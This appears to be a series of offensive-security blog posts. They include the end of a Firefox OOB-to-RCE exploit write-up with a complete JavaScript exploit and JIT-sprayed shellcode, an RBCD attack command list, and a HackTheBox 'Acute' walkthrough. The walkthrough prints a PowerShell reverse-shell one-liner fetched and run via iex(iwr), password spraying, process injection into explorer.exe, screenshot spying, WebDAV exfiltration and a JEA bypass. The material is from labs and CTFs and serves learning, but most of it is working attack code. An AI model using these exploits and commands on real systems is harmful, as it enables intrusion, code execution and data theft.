0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x4242424242424242
0x3f20d3c6a168: 0x4343434343434343  0x0000000000000000
0x3f20d3c6a178: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a188: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a198: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a1a8: 0x0000000000000000  0xfffe4d4d4d4d4d4d
0x3f20d3c6a1b8: 0xfffe4d4d4d4d4d4d  0x0000000000000000
0x3f20d3c6a1c8: 0x0000000000000000  0x000000000000000
js> console.log(read64(0x00003f20d3c6a160n).toString(16))
4242424242424242
js> console.log(read64(0x00003f20d3c6a168n).toString(16))
4343434343434343
js> console.log(read64(0x000055fd568dc088n).toString(16))
100000000

Writing works as well:

write64(0x00003f20d3c6a160n, 0xcafecafecafecafen)
js> console.log(read64(0x00003ed0df26a160n).toString(16))
cafecafecafecafe

One more primitive

Before we think about what we want to read or write we want to create another helper function that gives us the address of an arbitrary JavaScript object. This is very useful if we want to overwrite pointers in certain JavaScript Objects later on.

function addrof(obj){
    // Set a new property on the ArrayBuffer, it will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

This function requires some explanation. When we create a property on a JavaScript object, a pointer to those properties exists inside the object’s metadata (just like our data pointer from before). In the last memory dump we had no properties defined, but we can still see the slots pointer two values before the data pointer:

...
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088 < slots
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160 < elementsData
0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x4242424242424242
...

Now if we define a custom property bBuf.leak and then use our read primitive to dereference the slots pointer, we get the address of our obj, which was placed in the slots array. Note that we must mask off the upper 2 bytes since these encode type information (pointer tagging).
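
The interplay of read64 and addrof can be replayed in plain JavaScript with a toy memory model. This is only a sketch: a Map stands in for process memory, all addresses are invented, the engine's property store is imitated by the hypothetical setLeakProperty helper, and only the relative indices (13 and 15) mirror the real layout.

```javascript
// Toy model: a Map stands in for process memory (addresses are invented).
const mem = new Map();
const A_DATA = 0x1000n;                       // start of A's data
const B_SLOTS_FIELD = A_DATA + 13n * 8n;      // B's slots pointer, seen from A
const load = (addr) => mem.get(addr) ?? 0n;
const store = (addr, value) => mem.set(addr, value);

// Out-of-bounds view through A: index i touches A_DATA + 8*i, no bounds check.
const aGet = (i) => load(A_DATA + 8n * BigInt(i));
const aSet = (i, value) => store(A_DATA + 8n * BigInt(i), value);

// Reading B[0] dereferences whatever B's data pointer (A index 15) holds.
function read64(addr) {
    aSet(15, addr);
    return load(aGet(15));
}

// What the engine does for `bBuf.leak = obj` in this model: it points B's
// slots field at a slots array that holds the tagged object pointer.
function setLeakProperty(objAddr) {
    const SLOTS_ARRAY = 0x2000n;
    store(SLOTS_ARRAY, 0xfffe000000000000n | objAddr);
    store(B_SLOTS_FIELD, SLOTS_ARRAY);
}

function addrof(objAddr) {
    setLeakProperty(objAddr);
    const slots = aGet(13);                   // leak the slots pointer via A
    return read64(slots) & 0xffffffffffffn;   // dereference and strip the tag
}

console.log(addrof(0x3ee4bd6007a0n).toString(16)); // 3ee4bd6007a0
```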

Exploitation

If we think about exploitation, we want to get shellcode somewhere in memory and execute it. Unfortunately, it is not that easy, because memory that is writable from JavaScript is not executable, and anything we write from JavaScript might just be interpreted and never appear contiguously in memory. Even if our shellcode were in executable memory, we would still need a way to jump to it using only JavaScript, since we have some primitives but no control over any registers or the instruction pointer.

Let’s solve the shellcode problem first. One way to get your own code into executable memory is to use double constants. I learned about this method in this SentinelOne blog post: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/. Doubles have an 8-byte backing buffer, and if we define a bunch of them as constants one after another, we can get our shellcode bytes into consecutive, executable memory. I wrote a simple online converter to convert shellcode to doubles: https://vulndev.io/shellcode-converter/.

Shellcode

msfvenom -p linux/x64/exec cmd="/bin/sh -c 'id; bash'" -f csharp

byte[] buf = new byte[58] {0x48,0xb8,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0x00,0x99,0x50,0x54,0x5f,0x52,0x66,0x68,0x2d,
0x63,0x54,0x5e,0x52,0xe8,0x16,0x00,0x00,0x00,0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68,0x20,0x2d,0x63,0x20,0x27,0x69,0x64,0x3b,
0x20,0x62,0x61,0x73,0x68,0x27,0x00,0x56,0x57,0x54,0x5e,0x6a,
0x3b,0x58,0x0f,0x05};

Converted Shellcode

6.867659397734779e+246
7.806615353364766e+184
2.541954188459429e-198
3.2060568060029287e-80
3.4574612453438036e+198
7.57500810708945e-119
1.0802257739008538e+117
-6.828527034370483e-229
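
The conversion itself is small enough to sketch here. This is not the code of the online converter, just a minimal version of the same idea: take the bytes in chunks of eight and reinterpret each chunk as a little-endian double. Padding a short last chunk with 0x90 (NOP) is an assumption on my side, and the function names are made up.

```javascript
// Pack raw bytes into little-endian IEEE 754 doubles, 8 bytes per constant.
// Assumption: a short final chunk is padded with 0x90 (NOP).
function bytesToDoubles(bytes) {
    const padded = new Uint8Array(Math.ceil(bytes.length / 8) * 8).fill(0x90);
    padded.set(bytes);
    const view = new DataView(padded.buffer);
    const doubles = [];
    for (let off = 0; off < padded.length; off += 8) {
        doubles.push(view.getFloat64(off, true)); // true = little-endian
    }
    return doubles;
}

// Inverse direction, handy for checking a constant against the expected bytes.
function doubleToBits(value) {
    const view = new DataView(new ArrayBuffer(8));
    view.setFloat64(0, value, true);
    return view.getBigUint64(0, true);
}

// First eight bytes of the msfvenom output above.
const firstChunk = [0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73];
const [firstDouble] = bytesToDoubles(firstChunk);
console.log(firstDouble, doubleToBits(firstDouble).toString(16));
```

One caveat: a chunk whose bytes form a NaN bit pattern may not survive the round trip unchanged, so such a chunk would need to be rearranged or padded differently.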

Now we define the constants in a function and then call it often enough to trigger the JIT compiler. The JIT compiler essentially compiles certain code from JavaScript to native code if it makes sense (e.g. it’s used a lot) in order to optimize for speed. By calling our function many times we force this behavior. Now we can use our addrof primitive to get the address of our JITted function and then use gdb to inspect the memory. Note that we added the double for \x41\x41\x41\x41 as the first constant, followed by a constant full of NOPs, in order to find the shellcode in memory.

PoC_0x02.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray so we can store a 64 bit value
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229    
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}
console.log(addrof(shellcode).toString(16));
1362e6600860
js>

gef➤  tele 0x1362e6600860
0x001362e6600860│+0x0000: 0x00209976a3d160  →  0x00209976a3c0a0  →  0x0056278d78d150  →  0x0056278d845433  →  "Function"
0x001362e6600868│+0x0008: 0x0056278c099088  →  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al
0x001362e6600870│+0x0010: 0x0056278c098828  →  <emptyElementsHeader+16> add BYTE PTR [rax], al
0x001362e6600878│+0x0018: 0xfff88000000000a0
0x001362e6600880│+0x0020: 0xfffe209976a3f038
0x001362e6600888│+0x0028: 0x00209976a68150  →  0x002762b3c15cb0  →  0x0fc4f640ec8b4855
0x001362e6600890│+0x0030: 0xfffb209976a652a0
0x001362e6600898│+0x0038: 0x007f71b6cdca18  →  0x007f71b6cdc000  →  0x007f71b6c18000  →  0x0000000000000000
0x001362e66008a0│+0x0040: 0x00209976a6c1c0  →  0x00209976a3c2c8  →  0x0056278d793a90  →  0x0056278bf5b763  →  "BigUint64Array"
0x001362e66008a8│+0x0048: 0x0056278c099088  →  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al

This gives us the address of the JSFunction object of the function. At offset 0x28 we can see an interesting pointer to a heap region. This is the jitInfo pointer (JSFunction.u.native.extra.jitInfo); dereferencing it leads to the JIT code of the function at 0x002762b3c15cb0. This is likely more than just our shellcode though, since we just defined constants and they are treated as data at this point. We can disassemble at that address as code and notice that this looks like “real” instructions and not some random data:

x/100i 0x002762b3c15cb0

0x2762b3c15cb0:      push   rbp
0x2762b3c15cb1:      mov    rbp,rsp
0x2762b3c15cb4:      test   spl,0xf
0x2762b3c15cb8:      je     0x2762b3c15cbf
0x2762b3c15cbe:      int3
   ...

So let’s search for our marker and compare the pointers:

gef➤  grep 0x41414141
...
0x2762b3c16d90 - 0x2762b3c16d94  →   "AAAA"
...

We calculate: 0x2762b3c16d90 - 0x002762b3c15cb0 = 0x10E0. This means the JIT area of this function is actually pretty big, but if we search forward through it we will eventually find our marker. Let’s see if the constants ended up in memory as our shellcode:

x/20xg 0x2762b3c16d90

0x2762b3c16d90: 0x0000000041414141      0x9090909090909090
0x2762b3c16da0: 0x732f6e69622fb848      0x66525f5450990068
0x2762b3c16db0: 0x16e8525e54632d68      0x2f6e69622f000000
...

And as we can see, we found not only our marker but also the shellcode we intended in the correct order on a read/execute page.
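
The offset calculated above also tells us how far a forward scan from the start of the JIT code has to go. A quick sketch of that arithmetic, using the addresses from this debugging session (the variable names are made up; 0x800 is the iteration bound of the scan loop used further down):

```javascript
const jitCodeStart = 0x2762b3c15cb0n; // where the jitInfo pointer leads
const markerAddr = 0x2762b3c16d90n;   // where grep found 0x41414141

const offset = markerAddr - jitCodeStart;
const reads = offset / 8n; // number of 8-byte steps before the marker is hit

console.log(offset.toString(16)); // 10e0
console.log(reads);               // 540n
console.log(reads < 0x800n);      // true
```

In this session the marker sits 540 reads in, comfortably inside a scan of 0x800 (2048) reads. The offset changes between runs, so the bound is a safety margin and not an exact figure.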

After having solved the “shellcode problem” we still need a way to dynamically locate it (since it’s somewhere at a changing offset from where the jitInfo pointer points) and transfer execution to it. Finding the location is not that difficult, as we can use our read primitive to scan the memory until we find the marker:

...
shellcode_addr = addrof(shellcode);
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jitInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
        it = it + 8n;  // 8 byte offset to account for magic value
        found = true;
        break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
} 

There is one problem here – if you run it in the debug version it fails:

Assertion failure: !cx->nursery().isInside(ptr)

With the release build, however, it works. Debug builds add assertions to make sure nothing funky is going on, so most of the time it’s a good idea to start with the debug version but switch to release at some point. In this case, however, the challenge itself is also running in debug mode, so we have to fix our exploit to work around that! What I noticed other people doing to get around this is essentially looping until the shellcode pointer changes (often with some additional logic that didn’t appear to be required). I have no idea why this is required, but it works (please let me know!). So what we can add is a simple loop that waits for that change to occur:

shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
        // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   

With that last problem out of the way, transferring execution to our shellcode is actually quite easy because we can just write to the jitInfo pointer with the location of our shellcode:

write64(jitinfo, shellcode_location);
shellcode();

With this, we changed which native code is executed whenever we call the shellcode function. Remember that we only defined some constants earlier; they were never intended to be code, just (constant) data. By moving the jitInfo pointer forward to these constants, we make them code! With this last part done, we now have a full PoC and can run it to execute commands:

Full exploit

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray so we can store a 64 bit value
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}

// workaround to make the exploit work in release and debug version
shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
    // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jitInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
        it = it + 8n;  // 8 byte offset to account for magic value
        found = true;
        break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
}  

shellcode_location = it;
console.log("[>] Shellcode @ " + shellcode_location.toString(16));

// Overwrite jitInfo pointer and execute modified function
write64(jitinfo, shellcode_location);
shellcode();

This yields a shell:

[>] Function @ 279b70d00860
[>] Jitinfo @ 159537965150
[>] Jit RX @ 2ed9ab64b990
[>] Shellcode @ 2ed9ab64bd30
uid=1000(xct) gid=1000(xct) groups=1000(xct)
[email protected]:/home/xct$
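The marker search from the exploit can also be modelled offline. The following Python sketch scans a byte buffer in 8-byte steps for the 0x41414141 marker and returns the address right behind it, mirroring the loop above. The function name find_shellcode and the fake buffer are assumptions for illustration; the offset 0x398 is simply derived from the sample output (Shellcode address minus Jit RX address, minus the 8-byte marker).

```python
import struct

EGG = 0x41414141  # marker value used in the exploit

def find_shellcode(memory, base, max_qwords=0x800):
    """Return the address right after the egg, or None if it is not found."""
    for i in range(min(max_qwords, len(memory) // 8)):
        (qword,) = struct.unpack_from("<Q", memory, i * 8)
        if qword == EGG:
            return base + (i + 1) * 8  # skip the 8-byte marker itself
    return None

if __name__ == "__main__":
    rx_region = 0x2ED9AB64B990           # "Jit RX" value from the sample output
    fake = bytearray(0x1000)             # stand-in for the JIT region
    struct.pack_into("<Q", fake, 0x398, EGG)
    print(hex(find_shellcode(bytes(fake), rx_region)))
```

Returning None when the marker is missing makes the failure case explicit, whereas the JavaScript version only logs a message and carries on.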

For the remote version, just replace the shellcode with something that will grab the flag – I’ll leave that as an exercise for the reader 😉

The post Browser Exploitation: Firefox OOB to RCE appeared first on Vulndev.

Resource-Based Constrained Delegation – Resourced @ PG-Practice

By: xct
27 August 2022 at 15:30

Video & additional notes for Resourced, an intermediate difficulty Windows machine on PG-Practice that involves password spraying and an RBCD attack.

RBCD via WinRM & StandIn

# Upload
upload /home/xct/drop/StandIn_v13_Net45.exe StandIn.exe
upload /home/xct/drop/Rubeus.exe Rubeus.exe

# Create machine account
.\StandIn.exe --computer xct --make
Get-ADComputer -Filter * | Select-Object Name, SID

# Write msDS-AllowedToActOnBehalfOfOtherIdentity
.\StandIn.exe --computer ResourceDC --sid S-1-5-21-537427935-490066102-1511301751-4101

# Get Hash (on Kali)
import hashlib
# NT hash = MD4 over the UTF-16LE encoded password
nt_hash = hashlib.new('md4', "<new machine password from last step>".encode('utf-16le')).hexdigest()
print(nt_hash)

# Impersonate Administrator
.\Rubeus.exe s4u /user:xct /rc4:44714c0e1624e71ac5540fd3aa9c6681 /impersonateuser:administrator /msdsspn:cifs/resourcedc.resourced.local /nowrap /ptt

# Convert Ticket & PSExec with Kerberos (on Kali)
cat ticket.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=`pwd`/ticket.ccache
klist
impacket-psexec -k -no-pass resourced.local/[email protected] -dc-ip 192.168.114.175

The post Resource-Based Constrained Delegation – Resourced @ PG-Practice appeared first on Vulndev.

Active Directory, JEA & Random Stuff – Acute @ HackTheBox

By: xct
16 July 2022 at 15:00

Acute is a 40-point Active Directory Windows machine on HackTheBox. I’m going to use it to show some techniques which can be useful in other scenarios and keep it short on the things that are not that important.

User

Foothold

We visit https://atsserver.acute.local and find a company page. On the about page there is a list of employee names: Aileen Wallace, Charlotte Hall, Evan Davies, Ieuan Monks, Joshua Morgan, and Lois Hopkins. There is also a .docx file linked on the page, which we download and read. It links to https://atsserver.acute.local/Acute_Staff_Access and mentions a default password, “Password1!”. On /Acute_Staff_Access we find a PowerShell remoting web console. At this point we have to guess the username scheme the company might use and spray the password against all of the potential usernames.

This eventually leads to a valid login: username “acute\edavies”, password “Password1!”, computer name “Acute-PC01”. Now we have a WinRM shell on Acute-PC01 and can continue to explore it. Because I don’t like this web shell, we upgrade it to a remote interactive shell:
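Generating the candidate usernames is easy to script. Below is a small Python sketch that derives a few common naming conventions from the names on the about page. The list of formats is an assumption (the company's real scheme is not documented anywhere); the account names that show up in this post all follow the first-initial-plus-last-name pattern.

```python
NAMES = [
    "Aileen Wallace", "Charlotte Hall", "Evan Davies",
    "Ieuan Monks", "Joshua Morgan", "Lois Hopkins",
]

def candidates(full_name):
    """Return common username guesses for a 'First Last' name."""
    first, last = full_name.lower().split()
    return [
        first[0] + last,        # edavies
        first + "." + last,     # evan.davies
        first + last,           # evandavies
        first[0] + "." + last,  # e.davies
        last + first[0],        # daviese
        first,                  # evan
    ]

if __name__ == "__main__":
    for name in NAMES:
        for user in candidates(name):
            print(f"acute\\{user}")
```

The resulting list can then be tried against the web console together with the default password.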

PS C:\Users\edavies\Documents> iex(iwr http://10.10.14.7/run.txt -usebasicparsing)
...
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 49835
[>] whoami
acute\edavies

Contents of run.txt:

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.7",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "[>] ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

By looking at the running processes, we can see a lot of session 1 processes, including Edge, which means that besides us, the user edavies is also logged on locally on the system. We can also confirm this via qwinsta:

[>] ps
...
908      43    22492      66556       4.75   1544   1 msedge
309      18    97720      23976       0.41   3732   1 msedge
205      14     6832      16952       0.25   4108   1 msedge
245      15     8476      24576       0.56   4932   1 msedge
135       9     1924       6552       0.03   5048   1 msedge
...
[>] qwinsta

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 console           edavies                   1  Active

Session 0 Isolation says Hello

As we are connected via PSRemoting/WinRM, we are running in session 0 and therefore cannot interact with the logged-in user’s desktop (see “Sessions in Windows”). This comes with many restrictions, and we cannot really get an idea of what the user is doing on their desktop. We run a reverse shell via rcat and confirm that our shell is in session 0:

[>] iwr http://10.10.14.7/drop/rcat.exe -outfile
[>] C:\windows\temp\rcat_10.10.14.7_1337.exe 
...
nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 49880
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\temp> ps | findstr rcat
257       6      844       3544       0.00   5376   0 rcat_10.10.14.7_1337

One way to get out of session 0 is to inject into a process with a higher session ID. This is only possible if we either hold SeDebugPrivilege or the other process belongs to the same user (which is the case here). In the past you could inject shellcode and run it, but nowadays Windows binaries are typically compiled with Control Flow Guard (CFG), so an indirect jump to shellcode is not allowed. To get around that, we have to use a function that is already loaded and is a valid call target. A common way to achieve that is to inject a DLL with LoadLibrary, because this function is usually loaded and therefore will not cause any issues with CFG. It also takes exactly one argument, which is all we get when we use CreateRemoteThread to run code in a remote process.

In this case I decided to come up with a custom way that does not involve loading a DLL. If we look at the imports of explorer.exe we can see that it imports ShellExecuteExW from shell32.dll:

BOOL ShellExecuteExW(
  [in, out] SHELLEXECUTEINFOW *pExecInfo
);

This function is pretty much ideal: it takes exactly one argument (just like LoadLibrary) and allows running any binary on disk. So I ended up locating the address at which ShellExecuteExW is loaded in explorer.exe, allocating the required argument structure inside explorer.exe, and using WriteProcessMemory to copy it into the explorer.exe process. Finally, a call to CreateRemoteThread pointing to ShellExecuteExW and the argument structure allows us to execute an arbitrary executable. This is implemented in adopt.
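For reference, here is a hedged Python sketch of the argument structure that has to be written into the target process. It models the documented SHELLEXECUTEINFOW layout with ctypes and serializes it to bytes; it does not perform any injection. I have not checked how adopt builds the structure, so the helper build_exec_info and the merged hIconOrMonitor field (standing in for the hIcon/hMonitor union) are assumptions for illustration.

```python
import ctypes

class SHELLEXECUTEINFOW(ctypes.Structure):
    # Pointer fields are plain addresses here, because in the remote-thread
    # scenario they must point into the *target* process, not into ours.
    _fields_ = [
        ("cbSize", ctypes.c_uint32),
        ("fMask", ctypes.c_uint32),
        ("hwnd", ctypes.c_void_p),
        ("lpVerb", ctypes.c_void_p),
        ("lpFile", ctypes.c_void_p),
        ("lpParameters", ctypes.c_void_p),
        ("lpDirectory", ctypes.c_void_p),
        ("nShow", ctypes.c_int32),
        ("hInstApp", ctypes.c_void_p),
        ("lpIDList", ctypes.c_void_p),
        ("lpClass", ctypes.c_void_p),
        ("hkeyClass", ctypes.c_void_p),
        ("dwHotKey", ctypes.c_uint32),
        ("hIconOrMonitor", ctypes.c_void_p),
        ("hProcess", ctypes.c_void_p),
    ]

def build_exec_info(remote_path_addr, show=1):
    """Serialize a structure whose lpFile points at a path in the target process."""
    info = SHELLEXECUTEINFOW()
    info.cbSize = ctypes.sizeof(SHELLEXECUTEINFOW)
    info.lpFile = remote_path_addr
    info.nShow = show  # 1 == SW_SHOWNORMAL
    return bytes(info)

if __name__ == "__main__":
    blob = build_exec_info(0x10000)  # 0x10000 is a placeholder remote address
    print(hex(len(blob)))
```

The important detail is that the path string itself also has to be copied into the remote process first, since lpFile is dereferenced over there.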

So with this out of the way, we can continue to spawn a Session 1 process, using explorer.exe as a trampoline. We confirm that the new shell is indeed in session 1:

[>] iwr http://10.10.14.7/drop/adopt.exe -outfile C:\windows\temp\adopt.exe
[>] \windows\temp\adopt.exe explorer.exe c:\\windows\\temp\\rcat_10.10.14.7_1337.exe
...
nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 49820
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
Windows PowerShell

PS C:\temp> ps | findstr rcat
ps | findstr rcat
     73       6      856       3552       0.03   5856   1 rcat_10.10.14.7_1337

Spying on the user

Now we can interact with the user’s desktop, including starting new desktop applications or taking screenshots. I will take a couple of screenshots to get an idea of what the user is doing. This also led me down a rabbit hole, and I ended up coming up with scr. This command-line tool just takes a screenshot and saves it as “scr.jpg”. To get a few of those I run a simple loop, rename them, and finally zip them up:

iwr http://10.10.14.7/drop/scr.exe -outfile C:\temp\scr.exe
1..10 | % { \temp\scr.exe; start-sleep -s 3; rename-item "scr.jpg" "scr-$_.jpg" }; Compress-Archive -Path *.jpg -DestinationPath scr.zip

Copying out the files could be done with something like Metasploit or xc, but I got this far without them, so let’s try something else 😉 We are going to use WebDAV to copy them to our attacker machine. There is a cool repo by qtc that, among other things, allows starting nginx with WebDAV support in a Docker container, which I’m going to use here:

car run nginx
[+] Environment Variables:
[+]	car_local_uid                 1000
[+]	car_nginx_folder              /home/xct/arsenal/nginx
[+]	car_download_folder           /home/xct/arsenal/nginx/download
[+]	car_upload_folder             /home/xct/arsenal/nginx/upload
[+]	car_http_port                 80
[+]	car_https_port                443
[+]
[+] Running: sudo -E docker-compose up
Starting car.nginx ... done
Attaching to car.nginx
car.nginx    | [+] Adjusting UID values.
car.nginx    | [+] Adjusting volume permissions.
car.nginx    | [+] No password was specified.
car.nginx    | [+] Generated random password: SfGrc6Y2
car.nginx    | [+] Creating .htpasswd file.
car.nginx    | [+] WebDAV access allowed for default:SfGrc6Y2
car.nginx    | [+] Starting nginx daemon.

Now we can use PowerShell to PUT the file onto our system:

$auth = [Convert]::ToBase64String([Text.Encoding]::ASCII.GetBytes(("{0}:{1}" -f "default","SfGrc6Y2")))
Invoke-RestMethod -Headers @{Authorization=("Basic {0}" -f $auth)} -Uri "http://10.10.14.7/upload/scr.zip" -Method Put -InFile "C:\temp\scr.zip"  
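The same upload request can be expressed in Python, which makes it easier to see what the PowerShell one-liner sends: a PUT with a Basic Authorization header built from the WebDAV credentials. This is only a sketch; the helper name build_put_request is made up, and the request is constructed but deliberately not sent.

```python
import base64
import urllib.request

def build_put_request(url, user, password, payload):
    """Build (but do not send) a WebDAV PUT request with Basic authentication."""
    token = base64.b64encode(f"{user}:{password}".encode("ascii")).decode("ascii")
    return urllib.request.Request(
        url,
        data=payload,
        method="PUT",
        headers={"Authorization": f"Basic {token}"},
    )

if __name__ == "__main__":
    req = build_put_request(
        "http://10.10.14.7/upload/scr.zip", "default", "SfGrc6Y2", b"<zip bytes>"
    )
    print(req.get_method(), req.full_url)
    print(req.get_header("Authorization"))
    # urllib.request.urlopen(req) would actually perform the upload.
```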

We look at our screenshot collection and can see that the user is using PowerShell trying to connect to a remote system. We copy the commands from the screenshot (by hand) and can connect to the remote system:

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks",$passwd)
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -scriptblock { Get-Command }
...
CommandType     Name                                               Version    Source               PSComputerName
-----------     ----                                               -------    ------               --------------
Cmdlet          Get-Alias                                          3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-ChildItem                                      3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Command                                        3.0.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Content                                        3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Get-Location                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Set-Content                                        3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Set-Location                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER
Cmdlet          Write-Output                                       3.1.0.0    Microsoft.PowerSh... ATSSERVER

Note that the last command specifies ConfigurationName, which means that JEA is used here and we are limited in what we can run. A common bypass for JEA is to define a custom function and run it, which is what we are doing here:

Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { function xct { iex(iwr http://10.10.14.7/run.txt -usebasicparsing) };xct }

This gets us a reverse shell on the DC and allows us to read the user flag on imonks’ desktop.

listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.11.145] 52904
[>] hostname
ATSSERVER
[>] whoami
acute\imonks

Root

Another file on imonks’ desktop is wm.ps1, where we just have to modify the command to go back to Acute-PC01 with administrator privileges:

